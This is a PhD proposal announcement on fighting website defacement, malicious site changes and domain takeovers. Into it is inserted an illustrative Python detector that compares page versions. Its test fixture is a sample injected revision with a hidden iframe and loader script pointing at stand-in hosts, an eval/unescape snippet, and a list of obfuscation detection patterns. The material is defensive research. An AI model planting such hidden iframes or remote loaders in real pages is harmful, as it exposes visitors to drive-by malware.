PhD Proposal -- Kevin Borgolte

Date: Tuesday, August 29, 2017 - 1:00pm
Location: HFH 4164
Title: Fighting Large-scale Abuse and Web-based Threats
Committee: Christopher Kruegel (Co-Chair), Giovanni Vigna (Co-Chair), Ben Zhao

The widespread access to the Internet and the ubiquity of web-based services make it easy to communicate and interact globally. Unfortunately, the software implementing the functionality of websites is often vulnerable to attacks, such as code injection, or administrative access might not be restricted correctly. In turn, an attacker can exploit these vulnerabilities to compromise and abuse a website for nefarious purposes. In my research, I aim to better understand, detect, and prevent these attacks.

First, we look at a visible way in which websites are being compromised: website defacements, which can inflict significant harm on the website's owner through lost sales, lost reputation, or legal ramifications. I introduce Meerkat, a defacement detection system that requires no prior knowledge about the website's content or its structure, but only its URL. Meerkat uses computer vision techniques to recognize whether a website was defaced, similarly to how a human analyst decides whether a website was defaced when viewing it in a web browser.

Second, an attacker is not limited to abusing compromised websites in a way that is visible to users. Instead, she can infect them with malware. Although this is a known problem, identifying malicious websites has become a major challenge in today's Internet. I introduce Delta, a novel, purely static analysis approach that extracts change-related features between two versions of the same website, uses a machine-learning algorithm to derive a model of website changes, detects whether an introduced change was malicious or benign, identifies the underlying infection vector campaign based on clustering, and generates an identifying signature.
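To make the change-based idea concrete, the following script is an added illustration written for this page; it is not Delta's code, and the abstract does not disclose Delta's feature set, model, or clustering. It takes two versions of the same page (constructed sample HTML, not a real site), extracts features that describe only what changed (newly referenced external script hosts, newly added iframes, hidden iframes, and obfuscation indicators in newly added inline JavaScript), and scores them with a hand-weighted rule set that stands in for the trained model. The pattern list, weights, and threshold are assumptions chosen for the example; the clustering and signature-generation steps are not covered.

```python
"""Change-based flagging of a website revision (added example, not Delta's code).

Compare two HTML versions of one page, keep only features that describe the
change, and score them with an illustrative weighted rule set.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _PageInventory(HTMLParser):
    """Collects the script and iframe inventory of one HTML version."""

    def __init__(self):
        super().__init__()
        self.script_hosts = set()   # hosts of external <script src=...>; "" = same-origin
        self.iframes = []           # (src, width, height, style) per <iframe>
        self.inline_js = []         # bodies of inline <script> blocks
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_hosts.add(urlparse(a["src"]).netloc)
            else:
                self._in_inline_script = True
        elif tag == "iframe":
            self.iframes.append((a.get("src", ""), a.get("width", ""),
                                 a.get("height", ""), (a.get("style") or "").lower()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline_js.append(data)


def _inventory(html):
    parser = _PageInventory()
    parser.feed(html)
    parser.close()
    return parser


# Illustrative indicators of injected/obfuscated JavaScript; weights are assumptions.
OBFUSCATION_PATTERNS = {
    r"\beval\s*\(": 2,
    r"\bunescape\s*\(": 2,
    r"String\.fromCharCode": 2,
    r"document\.write\s*\(": 1,
    r"(?:\\x[0-9a-fA-F]{2}){8,}": 3,   # long run of hex-escaped characters
}


def _is_hidden(iframe):
    """An iframe sized to (near) zero or styled invisible is not meant for users."""
    _src, width, height, style = iframe
    compact = style.replace(" ", "")
    return (width in ("0", "1") or height in ("0", "1")
            or "display:none" in compact or "visibility:hidden" in compact)


def change_features(old_html, new_html):
    """Features describing only what changed between the two versions."""
    old, new = _inventory(old_html), _inventory(new_html)
    new_iframes = [f for f in new.iframes if f not in old.iframes]
    added_js = "\n".join(s for s in new.inline_js if s not in old.inline_js)
    return {
        "new_external_script_hosts": sorted(new.script_hosts - old.script_hosts - {""}),
        "new_iframes": len(new_iframes),
        "new_hidden_iframes": sum(1 for f in new_iframes if _is_hidden(f)),
        "added_inline_js_chars": len(added_js),
        "obfuscation_score": sum(w for pat, w in OBFUSCATION_PATTERNS.items()
                                 if re.search(pat, added_js)),
    }


def classify(features, threshold=4):
    """Stand-in for a learned model: weighted sum over the change features."""
    score = (3 * features["new_hidden_iframes"]
             + 1 * features["new_iframes"]
             + 2 * len(features["new_external_script_hosts"])
             + features["obfuscation_score"])
    return ("malicious" if score >= threshold else "benign"), score


# Constructed sample versions of one page (hypothetical hosts, not real sites).
V1 = """<html><head><script src="/js/app.js"></script></head>
<body><h1>News</h1><p>Welcome to our site.</p></body></html>"""

V2_BENIGN = """<html><head><script src="/js/app.js"></script>
<script>var page = "news"; console.log(page);</script></head>
<body><h1>News</h1><p>Welcome to our site. New article posted today.</p></body></html>"""

V2_MALICIOUS = """<html><head><script src="/js/app.js"></script></head>
<body><h1>News</h1><p>Welcome to our site.</p>
<iframe src="http://bad.example/kit" width="0" height="0" style="display: none"></iframe>
<script>eval(unescape("%3Cscript%3E..."));</script>
<script src="http://cdn-static.example/loader.js"></script></body></html>"""

if __name__ == "__main__":
    for name, new in (("benign edit", V2_BENIGN), ("injected change", V2_MALICIOUS)):
        feats = change_features(V1, new)
        print(name, classify(feats), feats)
```

The benign revision (new article text plus a plain inline script) yields an empty change profile and is left alone, while the injected revision is flagged by three independent change features at once: a zero-sized iframe, a new third-party script host, and eval/unescape in newly added inline code. Scoring only the delta, rather than the whole page, is what lets a legitimate but complex site avoid being penalized for content it always had.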

Finally, we take a first look at my ongoing work on the practicality and impact of domain takeover attacks, which an attacker can similarly abuse to spread misinformation or malware, and we perform a preliminary analysis of how these attacks can be foiled.

Everyone welcome!